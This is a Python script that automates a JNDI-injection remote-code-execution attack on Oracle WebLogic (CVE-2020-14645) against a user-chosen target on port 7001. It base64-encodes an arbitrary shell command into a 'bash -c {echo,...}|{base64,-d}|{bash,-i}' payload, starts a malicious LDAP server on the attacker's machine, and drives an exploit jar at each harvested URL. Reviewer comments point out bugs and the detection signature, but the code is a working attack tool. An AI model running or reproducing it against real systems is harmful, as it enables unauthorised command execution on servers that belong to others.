#! /usr/bin/python3
import base64
import pexpect
import re
import time
import argparse
import socket
# Command-line interface. NOTE: parse_args() runs at import time, so any
# module that imports this file has its own sys.argv consumed here.
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', action='store', dest='target', help='your target')
parser.add_argument('-c', '--cmd', action='store', dest='command', help='the command')
# Neither option is marked required, so args.target / args.command may be None.
args = parser.parse_args()
def get_network_ip():
    """Return the IP address of the local interface that has an outbound route.

    A UDP socket is "connected" to a fixed private address; no datagram is
    sent, but the kernel performs a route lookup and binds the socket to the
    interface it would use, whose address is then read back. May raise
    OSError on a host with no matching route.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as probe:
        probe.connect(('192.168.254.5', 80))
        local_address = probe.getsockname()[0]
    return local_address
# Resolved once at import time; if the route probe raises OSError the whole
# script aborts here.
local_ipaddr = get_network_ip()
def set_payload(cmd:str):
    """Build the command line that launches the JNDI-injection helper jar.

    `cmd` is base64-encoded and wrapped in a brace-expanded bash pipeline, so
    everything after `bash -c` contains no whitespace and no quote characters
    (the base64 alphabet has neither); it is then passed to the jar via -C,
    with the module-level `local_ipaddr` via -A (presumably the helper's
    listen address). The finished command line is printed and returned.
    Raises AttributeError if `cmd` is None (the --cmd option is optional).

    NOTE(review): the `bash -c {echo,...}|{base64,-d}|{bash,-i}` shape is a
    widely deployed command-line detection signature for JNDI-injection
    post-exploitation; process-creation telemetry on the target will carry
    it verbatim.
    """
    payload = 'bash -c {echo,' + base64.b64encode(cmd.encode()).decode() + '}|{base64,-d}|{bash,-i}'
    # The jar is expected in the current working directory; no existence check is done.
    java_payload = 'java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C \'' + payload + '\' -A ' + local_ipaddr
    print(java_payload)
    return java_payload
def get_url(pool:str):
    """Extract every ``:1389/<six non-whitespace chars>`` fragment from `pool`.

    `pool` is the captured text output of the helper process; each match is
    the port-and-path tail of a URL it printed. The list of matches is echoed
    to stdout and returned (empty when nothing matches).
    """
    tail_pattern = re.compile(r':1389/\S{6}')
    matches = tail_pattern.findall(pool)
    print(matches)
    return matches
def set_idap(target, command):
    """Drive the chain: start the helper, harvest its URLs, run the CVE jar per URL.

    NOTE(review): `target` is accepted but never used; the loop below reads
    the module-level `args.target` instead, so passing a different target to
    this function has no effect. `args.target` may also be None (the option
    is not required), in which case the string concatenation in the loop
    raises TypeError.
    """
    payload = set_payload(command)
    handler = pexpect.spawn(payload)
    try:
        # Give the helper up to 2 s to produce its initial output.
        handler.expect(pexpect.EOF,timeout=2)
    except:
        # Bare except: also swallows KeyboardInterrupt and SystemExit, not
        # just the pexpect.TIMEOUT that is presumably intended.
        pass
    # `before` holds whatever was read before the expect returned; it may be
    # None if nothing was read, and .decode() then raises AttributeError.
    result = handler.before.decode()
    print(result)
    # Fixed wait, presumably for the helper's listeners to come up; there is
    # no readiness check, so this is both slow and racy.
    time.sleep(20)
    print(type(result))
    # Prefix each ':1389/...' tail with the local address to form full endpoints.
    url_list = list(map(lambda x:local_ipaddr + x, get_url(result)))
    print(url_list)
    for i in url_list:
        print("java -jar CVE-2020-14645.jar " + i + " http://" + args.target + ":7001")
        exp_handler = pexpect.spawn("java -jar CVE-2020-14645.jar " + i + " http://" + args.target + ":7001")
        time.sleep(2)
        # Raises pexpect.TIMEOUT or pexpect.EOF if 'logic' never appears in the
        # child's output; this exception is not caught.
        exp_handler.expect('logic', timeout=2)
        print(exp_handler.read().decode().strip())
if __name__ == '__main__':
    # Argument parsing and the local-IP probe have already run at import time
    # (module level), so this guard only sequences the main action.
    set_idap(args.target, args.command)